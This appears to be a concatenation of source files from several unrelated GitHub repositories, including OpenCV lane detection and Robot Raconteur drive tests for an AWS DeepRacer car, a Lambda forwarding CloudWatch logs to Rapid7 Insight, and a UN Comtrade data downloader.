hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
ly = np.array([20,100,100],dtype=np.uint8)
uy = np.array([30,255,255],dtype=np.uint8)
lw = np.array([0,0,230],dtype=np.uint8)
uw = np.array([255,255,255],dtype=np.uint8)
w_mask = cv2.inRange(gray,200,255)
#w_mask = cv2.inRange(hsv,lw,uw)
y_mask = cv2.inRange(hsv,ly,uy)
yw_mask = cv2.bitwise_or(w_mask,y_mask)
final_image = cv2.bitwise_and(gray,yw_mask)
final_image_=cv2.GaussianBlur(final_image,(5,5),0)
canny_edge = cv2.Canny(final_image_,200,600)
return canny_edge,final_image
def ROI(frame):
height, width = frame.shape
mask = np.zeros_like(frame)
# only focus bottom half of the screen
polygon = np.array([[
(0, height * 1 / 2),
(width, height * 1 / 2),
(width, height),
(0, height),
]], np.int32)
cv2.fillPoly(mask, polygon, 255)
roi = cv2.bitwise_and(frame, mask)
return roi
def find_lines(frame):
# tuning min_threshold, minLineLength, maxLineGap is a trial and error process by hand
rho = 1 # distance precision in pixel, i.e. 1 pixel
angle = np.pi / 180 # angular precision in radian, i.e. 1 degree
min_threshold = 10 # minimal of votes
line_segments = cv2.HoughLinesP(frame, rho, angle, min_threshold,
np.array([]), minLineLength=8, maxLineGap=4)
return line_segments
def average_slope_intercept(frame, line_segments):
"""
This function combines line segments into one or two lane lines
If all line slopes are < 0: then we only have detected left lane
If all line slopes are > 0: then we only have detected right lane
"""
lane_lines = []
if line_segments is None:
logging.info('No line_segment segments detected')
return lane_lines
height, width, _ = frame.shape
left_fit = []
right_fit = []
boundary = 1/3
left_region_boundary = width * (1 - boundary) # left lane line segment should be on left 2/3 of the screen
right_region_boundary = width * boundary # right lane line segment should be on left 2/3 of the screen
for line_segment in line_segments:
for x1, y1, x2, y2 in line_segment:
if x1 == x2:
logging.info('skipping vertical line segment (slope=inf): %s' % line_segment)
continue
fit = np.polyfit((x1, x2), (y1, y2), 1)
slope = fit[0]
intercept = fit[1]
if abs(slope)<0.33:
continue
if slope < 0:
if x1 < left_region_boundary and x2 < left_region_boundary:
left_fit.append((slope, intercept))
else:
if x1 > right_region_boundary and x2 > right_region_boundary:
right_fit.append((slope, intercept))
left_fit_average = np.average(left_fit, axis=0)
if len(left_fit) > 0:
lane_lines.append(make_points(frame, left_fit_average))
right_fit_average = np.average(right_fit, axis=0)
if len(right_fit) > 0:
lane_lines.append(make_points(frame, right_fit_average))
logging.debug('lane lines: %s' % lane_lines) # [[[316, 720, 484, 432]], [[1009, 720, 718, 432]]]
return lane_lines
def make_points(frame, line):
height, width, _ = frame.shape
slope, intercept = line
y1 = height # bottom of the frame
y2 = int(y1 * 1 / 2) # make points from middle of the frame down
# bound the coordinates within the frame
x1 = max(-width, min(2 * width, int((y1 - intercept) / slope)))
x2 = max(-width, min(2 * width, int((y2 - intercept) / slope)))
return [[x1, y1, x2, y2]]
```
#### File: rr_awsdeepracer/clients/lane_steam_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
import keyboard
import Queue
sys.path.append("..")
import lane_finder
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def image_stream(cam_data):
im=cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
return im_
def display_lines(frame, lines, line_color=(0, 255, 0), line_width=2):
line_image = np.zeros_like(frame)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(line_image, (x1, y1), (x2, y2), line_color, line_width)
line_image = cv2.addWeighted(frame, 0.8, line_image, 1, 1)
return line_image
def main(frame):
vid_im = nd_arr_transform(frame)
out.write(vid_im)
class video_buffer(object):
def __init__(self,driver):
self._queue_lock = threading.RLock()
self._queue_driver_lock = threading.RLock()
self._queue = Queue.LifoQueue()
self.driver = driver
self.stopped = False
def add_queue(self,value):
with self._queue_lock:
self._queue.put(value)
def thread_func(self):
while not self.stopped and not self._queue.empty():
with self._queue_driver_lock:
frame = self._queue.get()
self.driver.detect_lane(frame)
self.driver.drive()
if __name__ == '__main__':
url_servo = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=Servo'
url_camera = 'rr+tcp://localhost:'+sys.argv[2]+'/?service=AWSCamera'
servo_ctrl = RRN.ConnectService(url_servo)
cam_data = RRN.ConnectService(url_camera)
driver = laneDriver.LaneDrive(servo_ctrl)
raw_input("press enter to begin: ")
cam_data.startCamera()
vb = video_buffer(driver)
time.sleep(0.3)
im = cam_data.getCurrentImage()
frame_width = im.width
frame_height = im.height
#global out
#out = cv2.VideoWriter('lane_real.avi',cv2.VideoWriter_fourcc(*'XVID'), 10, (frame_width,frame_height))
servo_ctrl.Drive(0.8,0)
while True:
frame = image_stream(cam_data)
vb.add_queue(frame)
t = threading.Thread(target=vb.thread_func)
t.start()
#lane_lines = driver.lane_lines
#lane_line_image = display_lines(frame,lane_lines)
#out.write(lane_line_image)
try:
if keyboard.is_pressed('space'):
servo_ctrl.Stop()
break
except:
continue
#out.release()
```
#### File: rr_awsdeepracer/testing/lane_driving_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
sys.path.append("..")
import lane_finder
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
if __name__ == '__main__':
url_servo = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=Servo'
url_camera = 'rr+tcp://localhost:'+sys.argv[2]+'/?service=AWSCamera'
servo_ctrl = RRN.ConnectService(url_servo)
cam_data = RRN.ConnectService(url_camera)
driver = laneDriver.LaneDrive(servo_ctrl)
cam_data.startCamera()
raw_input("Press Enter to begin: ")
im = cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
driver.detect_lane(im_)
driver.drive()
time.sleep(6)
servo_ctrl.Stop()
```
#### File: rr_awsdeepracer/testing/servolaneTest.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
sys.path.append('..')
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def image_stream(cam_data):
im=cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
return im_
def display_lines(frame, lines, line_color=(0, 255, 0), line_width=2):
line_image = np.zeros_like(frame)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(line_image, (x1, y1), (x2, y2), line_color, line_width)
line_image = cv2.addWeighted(frame, 0.8, line_image, 1, 1)
return line_image
if __name__ == '__main__':
url = 'rr+tcp://localhost:'+sys.argv[1]+'?service=AWSCamera'
print(url)
cam_ctrl = RRN.ConnectService(url)
cam_ctrl.startCamera()
driver = laneDriver.LaneDrive(None)
while True:
frame = image_stream(cam_ctrl)
driver.detect_lane(frame)
driver.drive()
print(driver.c_drive_by_angle)
```
#### File: rr_awsdeepracer/testing/stream_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
sys.path.append('..')
import threading
import logging
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def next_frame(pipe_ep):
global current_frame
while(pipe_ep.Available > 0):
image = pipe_ep.RecievePacket()
current_frame = nd_arr_transform(image)
current_frame = None
if __name__ == '__main__':
url_camera = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=AWSCamera'
cam_data = RRN.ConnectService(url_camera)
p=cam_data.ImageStream.Connect(-1)
p.PacketReceivedEvent+=next_frame
raw_input("press enter to begin: ")
cam_data.startCamera()
while True:
if (not current_frame is None):
cv2.imshow("Image",current_frame)
if cv2.waitKey(50)!=-1:
break
cv2.destroyAllWindows()
p.Close()
``` |
{
"source": "johnwquarles/r7insight_lambdaCW",
"score": 2
} |
#### File: johnwquarles/r7insight_lambdaCW/r7insight_lambdaCW.py
```python
import logging
import json
import socket
import ssl
import certifi
import os
from uuid import UUID
import base64
import zlib
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.info('Loading function...')
REGION = os.environ.get('region')
ENDPOINT = f'{REGION}.data.logs.insight.rapid7.com'
PORT = 20000
TOKEN = os.environ.get('token')
FAKE_NEWLINE = u'\u<PASSWORD>'
def treat_message(message):
"""
Replace newline characters in the supplied message with "fake"
unicode line breaks (\u2028), so that the message can be sent
as a single log event.
"""
return message.replace('\n', FAKE_NEWLINE)
def lambda_handler(event, context):
sock = create_socket()
if not validate_uuid(TOKEN):
logger.critical(f'{TOKEN} is not a valid token. Exiting.')
raise SystemExit
else:
cw_data = base64.b64decode(event['awslogs']['data'])
cw_logs = zlib.decompress(cw_data, 16+zlib.MAX_WBITS)
log_events = json.loads(cw_logs)
logger.info('Received log stream...')
logger.info(log_events)
for log_event in log_events['logEvents']:
# look for extracted fields, if not present, send plain message
try:
msg = f"{TOKEN} {json.dumps(log_event['extractedFields'])}\n"
sock.sendall(msg.encode('utf-8'))
except KeyError:
treated_msg = treat_message(log_event['message'])
msg = f"{TOKEN} {treated_msg}\n"
sock.sendall(msg.encode('utf-8'))
sock.close()
logger.info('Function execution finished.')
def create_socket():
logger.info('Creating SSL socket')
s_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(
sock=s_,
keyfile=None,
certfile=None,
server_side=False,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=getattr(
ssl,
'PROTOCOL_TLSv1_2',
ssl.PROTOCOL_TLSv1
),
ca_certs=certifi.where(),
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
)
try:
logger.info(f'Connecting to {ENDPOINT}:{PORT}')
s.connect((ENDPOINT, PORT))
return s
except socket.error as exc:
logger.error(f'Exception socket.error : {exc}')
def validate_uuid(uuid_string):
try:
val = UUID(uuid_string)
except Exception as uuid_exc:
logger.error(f'Can not validate token: {uuid_exc}')
return False
return val.hex == uuid_string.replace('-', '')
``` |
{
"source": "johnwslee/extrucal",
"score": 3
} |
#### File: extrucal/tests/test_extrusion.py
```python
import pytest
import pandas as pd
import numpy as np
import altair as alt
from extrucal.extrusion import throughput_cal, throughput_table, throughput_plot
alt.renderers.enable('html')
def test_input_data():
"""
Check Errors raised when incorrect inputs are used
Test cases:
1. input types
2. input values
"""
# Test input types
with pytest.raises(TypeError):
throughput_cal("200", 10, 800)
with pytest.raises(TypeError):
throughput_cal(200, "10", 800)
with pytest.raises(TypeError):
throughput_cal(200, 10, "800")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, rpm="1")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, pitch="200")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_table("200", 800)
with pytest.raises(TypeError):
throughput_table(200, "800")
with pytest.raises(TypeError):
throughput_table(200, 800, pitch="200")
with pytest.raises(TypeError):
throughput_table(200, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_table(200, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_table(200, 800, min_depth="4")
with pytest.raises(TypeError):
throughput_table(200, 800, max_depth="20")
with pytest.raises(TypeError):
throughput_table(200, 800, delta_depth="2")
with pytest.raises(TypeError):
throughput_table(200, 800, min_rpm="5")
with pytest.raises(TypeError):
throughput_table(200, 800, max_rpm="50")
with pytest.raises(TypeError):
throughput_table(200, 800, delta_rpm="5")
with pytest.raises(TypeError):
throughput_plot("200", 800)
with pytest.raises(TypeError):
throughput_plot(200, "800")
with pytest.raises(TypeError):
throughput_plot(200, 800, pitch="200")
with pytest.raises(TypeError):
throughput_plot(200, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_plot(200, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_plot(200, 800, min_depth="4")
with pytest.raises(TypeError):
throughput_plot(200, 800, max_depth="20")
with pytest.raises(TypeError):
throughput_plot(200, 800, delta_depth="2")
with pytest.raises(TypeError):
throughput_plot(200, 800, min_rpm="5")
with pytest.raises(TypeError):
throughput_plot(200, 800, max_rpm="50")
with pytest.raises(TypeError):
throughput_plot(200, 800, delta_rpm="5")
# Test input values
with pytest.raises(ValueError):
throughput_cal(200, 1, 800)
with pytest.raises(ValueError):
throughput_cal(200, 61, 800)
with pytest.raises(ValueError):
throughput_cal(4, 1, 800)
with pytest.raises(ValueError):
throughput_cal(501, 20, 800)
with pytest.raises(ValueError):
throughput_cal(200, 10, 290)
with pytest.raises(ValueError):
throughput_cal(200, 10, 3001)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, pitch=39)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, pitch=501)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, n_flight=3)
with pytest.raises(ValueError):
throughput_table(200, 800, min_depth = 1)
with pytest.raises(ValueError):
throughput_table(200, 800, max_depth = 61)
with pytest.raises(ValueError):
throughput_table(4, 800)
with pytest.raises(ValueError):
throughput_table(501, 800)
with pytest.raises(ValueError):
throughput_table(200, 290)
with pytest.raises(ValueError):
throughput_table(200, 3001)
with pytest.raises(ValueError):
throughput_table(200, 800, pitch=39)
with pytest.raises(ValueError):
throughput_table(200, 800, pitch=501)
with pytest.raises(ValueError):
throughput_table(200, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_table(200, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_table(200, 800, n_flight=3)
with pytest.raises(ValueError):
throughput_plot(200, 800, min_depth = 1)
with pytest.raises(ValueError):
throughput_plot(200, 800, max_depth = 61)
with pytest.raises(ValueError):
throughput_plot(4, 800)
with pytest.raises(ValueError):
throughput_plot(501, 800)
with pytest.raises(ValueError):
throughput_plot(200, 290)
with pytest.raises(ValueError):
throughput_plot(200, 3001)
with pytest.raises(ValueError):
throughput_plot(200, 800, pitch=39)
with pytest.raises(ValueError):
throughput_plot(200, 800, pitch=501)
with pytest.raises(ValueError):
throughput_plot(200, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_plot(200, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_plot(200, 800, n_flight=3)
def test_output():
"""
Check if the returned output is correct
"""
# Test the output of throughput()
expected1 = 23.51
actual1 = throughput_cal(200, 10, 800, rpm=1, pitch=200, w_flight=20, n_flight=1)
assert actual1 == expected1, "Calculated Value is wrong!!!"
expected2 = 4540.04
actual2 = throughput_cal(250, 12, 800, rpm=100, pitch=300, w_flight=25, n_flight=2)
assert actual2 == expected2, "Calculated Value is wrong!!!"
expected3 = 1.69
actual3 = throughput_cal(20, 2, 1000, rpm=30, pitch=20, w_flight=2, n_flight=1)
assert actual3 == expected3, "Calculated Value is wrong!!!"
expected4 = 12.24
actual4 = throughput_cal(150, 6.8, 800, rpm=1, pitch=206, w_flight=9, n_flight=1)
assert actual4 == expected4, "Calculated Value is wrong!!!"
# Test the output of throughput_table()
expected5 = 10
actual5 = len(throughput_table(200, 1000))
assert actual5 == expected5, "The number of rows doesn't match!!!"
expected6 = 9
actual6 = len(throughput_table(200, 1000, min_rpm=6))
assert actual6 == expected6, "The number of rows doesn't match!!!"
expected7 = 2
actual7 = len(throughput_table(200, 1000, max_rpm=14))
assert actual7 == expected7, "The number of rows doesn't match!!!"
expected8 = 8
actual8 = len(throughput_table(200, 1000).columns)
assert actual8 == expected8, "The number of columns doesn't match!!!"
expected9 = 3
actual9 = len(throughput_table(200, 1000, max_depth=9).columns)
assert actual9 == expected9, "The number of columns doesn't match!!!"
expected10 = 2
actual10 = len(throughput_table(200, 1000, min_depth=16).columns)
assert actual10 == expected10, "The number of columns doesn't match!!!"
# Test the output of throughput_plot()
test_plot = throughput_plot(200, 1000)
assert str(type(test_plot)) == "<class 'altair.vegalite.v4.api.Chart'>"
assert test_plot.encoding.x.shorthand == 'RPM', "'RPM' should be mapped to the x axis"
assert test_plot.encoding.y.shorthand == 'throughput', "'throughput' should be mapped to the y axis"
assert test_plot.mark == 'circle', "mark should be a circle"
tooltip = "[Tooltip({\n shorthand: 'RPM'\n}), Tooltip({\n shorthand: 'depth'\n}), Tooltip({\n shorthand: 'throughput'\n})]"
assert str(throughput_plot(200, 1000).encoding.tooltip) == tooltip
``` |
{
"source": "johnx25bd/casa-digital-visualisation",
"score": 3
} |
#### File: data/Comparison/UN_Comtrade.py
```python
import pandas as pd
import numpy as np
import json
import requests
import os.path
import itertools
from time import sleep
base_url = 'https://comtrade.un.org/api/get?'
def download_trade_data(filename, human_readable=False, verbose=True,
period='recent', frequency='A', reporter='USA', partner='all', product='total', tradeflow='exports'):
"""
Downloads records from the UN Comtrade database and saves them in a csv-file with the name "filename".
If necessary, it calls the API several times.
There are two modes:
- human_readable = False (default): headings in output are not human-readable but error messages from the API are received and displayed
- human_readable = True: headings in output are human-readable but we do not get messages from the API about potential problems (not recommended if several API calls are necessary)
Additional option: verbose = False in order to suppress both messages from the API and messages like '100 records downloaded and saved in filename.csv' (True is default)
Parameters:
Using parameter values suggested in the API documentation should always work.
For the parameters period, reporter, partner and tradeflow more intuitive options have been added.
- period [ps] : depending on freq, either YYYY or YYYYMM (or 'YYYY-YYYY'/ 'YYYYMM-YYYYMM' or a list of those) or 'now' or 'recent' (= 5 most recent years/ months) or 'all'
- frequency [freq] : 'A' (= annual) or 'M' (= monthly)
- reporter [r] : reporter code/ name (case-sensitive!) or list of reporter codes/ names or 'all' (see https://comtrade.un.org/data/cache/reporterAreas.json)
- partner [p] : partner code/ name (case-sensitive!) or list of partner codes/ names or 'all' (see https://comtrade.un.org/data/cache/partnerAreas.json)
- product [cc] : commodity code valid in the selected classification (here: Harmonized System HS) or 'total' (= aggregated) or 'all' or 'HG2', 'HG4' or 'HG6' (= all 2-, 4- and 6-digit HS commodities)
- tradeflow [rg] : 'import[s]' or 'export[s]'; see https://comtrade.un.org/data/cache/tradeRegimes.json for further, lower-level options
Information copied from the API Documentation (https://comtrade.un.org/data/doc/api/):
Usage limits
Rate limit (guest): 1 request every second (per IP address or authenticated user).
Usage limit (guest): 100 requests per hour (per IP address or authenticated user).
Parameter combination limit: ps, r and p are limited to 5 codes each. Only one of the above codes may use the special ALL value in a given API call.
Classification codes (cc) are limited to 20 items. ALL is always a valid classification code.
If you hit a usage limit a 409 (conflict) error is returned along with a message specifying why the request was blocked and when requests may resume.
Stability
Notice: this API may be considered stable. However, new fields may be added in the future.
While this API is still subject to change, changes that remove fields will be announced and a method of accessing legacy field formats will be made available during a transition period.
New fields may be added to the CSV or JSON output formats without warning. Please write your code that accesses the API accordingly.
"""
# (1) replace more convenient input options by ones that can by understood by API
# e.g. replace country names by country codes or 'YYYYMM-YYYYMM' by a list of months
reporter = transform_reporter(reporter)
partner = transform_partner(partner)
tradeflow = transform_tradeflow(tradeflow)
period = transform_period(period, frequency)
# (2) warn/ raise an error if appropriate
if sum('all' in inpt for inpt in [reporter, partner, period]) > 1:
raise ValueError("Only one of the parameters 'reporter', 'partner' and 'period' may use the special ALL value in a given API call.")
if any(len(inpt) > 5 for inpt in [reporter, partner, period]) and human_readable:
print("Using the option human_readable=True is not recommended in this case because several API calls are necessary.")
print("When using the human_readable=True option, messages from the API cannot be received!")
response = input("Press y if you want to continue anyways. ")
if response != 'y':
return None # exit function
# (3) download data by doing one or several API calls
dfs = []
slice_points = [range(0, len(inpt), 5) for inpt in [reporter, partner, period]] + \
[range(0, len(product), 20)]
# since the parameters reporter, partner and period are limited to 5 inputs each and
# product is limited to 20 inputs
for i, j, k, m in itertools.product(*slice_points):
df = download_trade_data_base(human_readable=human_readable, verbose=verbose,
period=period[k:k+5], reporter=reporter[i:i+5],
partner=partner[j:j+5], product=product[m:m+20],
tradeflow=tradeflow, frequency=frequency, )
if df is not None:
dfs.append(df)
sleep(1) # wait 1 second because of API rate limit
# (4) save dataframe as csv file
if len(dfs) > 0:
df_all = pd.concat(dfs)
filename = filename if len(filename.split('.')) == 2 else filename + '.csv' # add '.csv' if necessary
df_all.to_csv(filename)
if verbose: print('{} records downloaded and saved as {}.'.format(len(df_all), filename))
def download_trade_data_base(human_readable=False, verbose=True,
period='recent', frequency='A', reporter=842, partner='all', product='total', tradeflow=2):
"""
Downloads records from the UN Comtrade database and returns pandas dataframe using one API call.
There are two modes:
- human_readable = False (default): headings in output are not human-readable but error messages from the API are received and displayed
- human_readable = True: headings in output are human-readable but we do not get messages from the API about potential problems
Additional option: verbose = False in order to suppress messages from the API (True is default)
Parameters of the API call:
As documented in the API documentation.
More intuitive options for the parameters period, reporter, partner and tradeflow are only available in the function 'download_trade_data'!
- period [ps] : depending on freq, either YYYY or YYYYMM (or a list of those) or 'now' or 'recent' (= 5 most recent years/ months) or 'all'
- frequency [freq] : 'A' (= annual) or 'M' (= monthly)
- reporter [r] : reporter code or list of reporter codes or 'all' (see https://comtrade.un.org/data/cache/reporterAreas.json)
- partner [p] : partner code or list of partner codes or 'all' (see https://comtrade.un.org/data/cache/partnerAreas.json)
- product [cc] : commodity code valid in the selected classification (here: Harmonized System HS) or 'total' (= aggregated) or 'all' or 'HG2', 'HG4' or 'HG6' (= all 2-, 4- and 6-digit HS commodities)
- tradeflow [rg] : 1 (for imports) or 2 (for exports); see https://comtrade.un.org/data/cache/tradeRegimes.json for further options
"""
fmt = 'csv' if human_readable else 'json'
head = 'H' if human_readable else 'M'
parameters = {
'ps': period,
'freq': frequency,
'r': reporter,
'p': partner,
'cc': product,
'rg': tradeflow,
'px': 'HS', # Harmonized System (as reported) as classification scheme
'type': 'C', # Commodities ('S' for Services)
'fmt': fmt, # format of the output
'max': 50000, # maximum number of rows -> what happens if number of rows is bigger?
# https://comtrade.un.org/data/dev/portal#subscription says it is 100 000
'head': head # human readable headings ('H') or machine readable headings ('M')
}
url = base_url + dict_to_string(parameters)
if verbose: print(url)
if human_readable:
dataframe = pd.read_csv(url)
else:
json_dict = requests.get(url).json()
n_records = json_dict['validation']['count']['value']
message = json_dict['validation']['message']
if not json_dict['dataset']:
if verbose: print('Error: empty dataset \n Message: {}'.format(message))
dataframe = None
else:
if verbose and message: print('Message: {}'.format(message))
dataframe = pd.DataFrame.from_dict(json_dict['dataset'])
return dataframe
###############################################################################
def transform_reporter(reporter):
"""
replaces country names in reporter by the corresponding country codes
"""
# if single country code/ name, convert to list
reporter = [reporter] if not isinstance(reporter, list) else reporter
# replace country names by country codes
reporter = [r if is_country_code(r) else find_reporter_code(r) for r in reporter]
return reporter
def transform_partner(partner):
"""
replaces country names in partner by the corresponding country codes
"""
# if single country code/ name, convert to list
partner = [partner] if not isinstance(partner, list) else partner
# replace country names by country codes
partner = [p if is_country_code(p) else find_partner_code(p) for p in partner]
return partner
def transform_tradeflow(tradeflow):
"""
replace tradeflow "import(s)" or "export(s)" by the corresponding numbers (1 / 2)
"""
if isinstance(tradeflow, str):
if 'export' in tradeflow.lower():
tradeflow = 2
elif 'import' in tradeflow.lower():
tradeflow = 1
return tradeflow
def transform_period(period, frequency):
"""
detects 'YYYY-YYYY' or 'YYYYMM-YYYYMM' inputs and transforms them into lists of YYYY or YYYYMM that the API can understand
the function does not check whether the other inputs for period are valid!
period: depending on freq, either YYYY or YYYYMM (or 'YYYY-YYYY'/ 'YYYYMM-YYYYMM' or a list of those) or 'now' or 'recent' or 'all'
frequency: 'A' or 'M'
"""
period = [period] if not isinstance(period, list) else period
period_new = []
for p in period:
if isinstance(p, str) and '-' in p:
start, end = p.split('-')
if frequency.lower() == 'a':
y_start = int(start)
y_end = int(end)
for y in range(y_start, y_end + 1):
period_new.append(y)
elif frequency.lower() == 'm':
y_start, m_start = int(start[:4]), int(start[4:])
y_end, m_end = int(end[:4]), int(end[4:])
n = (m_end - m_start + 1) + 12 * (y_end - y_start)
y, m = y_start, m_start
for _ in range(n):
period_new.append('{}{:02d}'.format(y, m))
if m >= 1 and m < 12:
m +=1
elif m == 12:
m = 1
y += 1
else:
raise Exception("Shouldn't get here.")
else:
raise Exception("Frequency neither 'A'/'a' nor 'M'/'m'.")
else:
period_new.append(p)
return period_new
def is_country_code(inpt):
"""
checks if inpt is a valid country code, i.e. an integer, an integer converted to a string or 'all'
output: True or False
"""
if isinstance(inpt, str):
return inpt.lower() == 'all' or inpt.isdigit()
else:
return isinstance(inpt, int) or isinstance(inpt, np.int64)
def find_reporter_code(country):
"""
see 'find_country_code'
"""
return find_country_code(country, 'reporter')
def find_partner_code(country):
"""
see 'find_country_code'
"""
return find_country_code(country, 'partner')
def find_country_code(country, reporter_or_partner):
"""
tries to find the country code corresponding to a country name
procedure: try to find exact match, if not look for partial matches
input country: country name or part of country name (case-sensitive!)
input reporter_or_partner: 'reporter' or 'partner'
output: country code
"""
# we use a local copy of the file with country codes so that we do not have to use
# https://comtrade.un.org/data/cache/reporterAreas.json every time
if not os.path.exists(reporter_or_partner + 'Areas.csv'):
download_country_codes_file(reporter_or_partner)
df = pd.read_csv(reporter_or_partner + 'Areas.csv', encoding='latin_1', index_col=0)
# look for an exact match
mask = (df.text == country)
if sum(mask) == 1:
code = df.index[mask].tolist()[0]
return code
# look for a partial match
# this might be useful because some 'official' names of countries are not always that well-known
# e.g. 'Bolivia (Plurinational State of)' instead of Bolivia'
mask2 = (df.text.str.contains(country))
if sum(mask2) > 0:
print('There is no country in the json-file with the exact name "{}". '.format(country) + \
'The following countries contain the word "{}". '.format(country) + \
'If you think that one of the following countries is the one that you are looking for, press "y".')
dict_matches = df[mask2].text.to_dict()
for code, country in dict_matches.items():
response = input('{} {} [y?] '.format(code, country))
if response == 'y':
return code
# if no code could be found:
raise LookupError('It was not possible to find a code that corresponds to the country {}.'.format(country))
def download_country_codes_file(reporter_or_partner):
"""
downloads either the reporter or the partner file and saves it in the current directory
input: 'reporter' or 'partner'
"""
url = 'https://comtrade.un.org/data/cache/{}Areas.json'.format(reporter_or_partner)
json_dict = requests.get(url).json()
df = pd.DataFrame.from_dict(json_dict['results'])
df = df.set_index('id')
df.drop('all', inplace=True)
df.to_csv('{}Areas.csv'.format(reporter_or_partner))
def dict_item_to_string(key, value):
"""
inputs: key-value pairs from a dictionary
output: string 'key=value' or 'key=value1,value2' (if value is a list)
examples: 'fmt', 'csv' => 'fmt=csv' or 'r', [124, 484] => 'r=124,484'
"""
value_string = str(value) if not isinstance(value, list) else ','.join(map(str, value))
return '='.join([key, value_string])
def dict_to_string(parameters):
"""
input: dictionary of parameters
output: string 'key1=value1&key2=value2&...'
"""
return '&'.join(dict_item_to_string(key, value) for key, value in parameters.items())
###############################################################################
def product_codes_with_parent(parent_code):
"""
Returns a python dictionary with all entries that belong to parent_code.
"""
if not os.path.exists('classificationHS.csv'):
download_product_codes_file()
df = load_product_codes_file()
mask = df.parent == parent_code
return df.text[mask].to_dict()
def search_product_code(pat, case=True, flags=0, regex=True, n_digits=None):
"""
Returns a python dictionary with all entries that contain the pattern pat and have a code with length n_digits.
If n_digits = None (default), we do not care about how many digits the classification code has.
For searching for the pattern pat, we use pd.Series.str.contains which takes the following parameters:
pat : string
Character sequence or regular expression
case : boolean, default True
If True, case sensitive
flags : int, default 0 (no flags)
re module flags, e.g. re.IGNORECASE
regex : bool, default True
If True use re.search, otherwise use Python in operator
"""
if not os.path.exists('classificationHS.csv'):
download_product_codes_file()
df = load_product_codes_file()
if n_digits is not None:
mask1 = df.text.str.contains(pat, case=case, flags=flags, regex=regex)
mask2 = df.index.to_series().apply(lambda digit: len(digit) == n_digits)
mask = mask1 & mask2
else: mask = df.text.str.contains(pat, case=case, flags=flags, regex=regex)
return df.text[mask].to_dict()
def load_product_codes_file():
"""
Loads the product codes file as a pandas dataframe.
"""
df = pd.read_csv('classificationHS.csv', encoding='latin-1', index_col='id')
return df
def download_product_codes_file():
"""
Downloads the product codes files and saves it in the current directory.
The short-cut entries for 'ALL', 'TOTAL', 'AG2', 'AG4' and 'AG6' are deleted.
"""
url = 'https://comtrade.un.org/data/cache/classificationHS.json'
json_dict = requests.get(url).json()
df = pd.DataFrame.from_dict(json_dict['results'])
df = df.set_index('id')
df.drop(['ALL', 'TOTAL', 'AG2', 'AG4', 'AG6'], inplace=True)
df.text = df.text.apply(lambda x: ' - '.join(x.split(' - ')[1:])) # remove digits from beginning of text
df.to_csv('classificationHS.csv')
``` |
{
"source": "johnxferraro/data-structures-and-algorithms",
"score": 3
} |
#### File: javascript/code-challenges/MinCostClimbingStairs.py
```python
class Solution(object):
def minCostClimbingStairs(self, cost):
"""
:type cost: List[int]
:rtype: int
"""
cost.append(0)
# iterate backwards, starting on the length of cost minus 3, going back -1 each time until hitting -1.
# in the case of [10, 15, 20] 0
for i in range(len(cost) - 3, -1, -1):
# whichever one is smaller (15 + 20 or 15 + 0 for the first case)
cost[i] += min(cost[i + 1], cost[i + 2])
return min(cost[0], cost[1])
``` |
{
"source": "johnxguo/test",
"score": 3
} |
#### File: test/misc/test.py
```python
import os
import time
from colorama import Fore, Back, Style, init
import asyncio
def asyncrun(future):
return asyncio.get_event_loop().run_until_complete(future)
async def fa(num):
a = 1 / num
async def downloadPath(path):
tasks = [
asyncio.ensure_future(fa(1)),
asyncio.ensure_future(fa(0))
]
try:
a = await asyncio.wait(tasks)
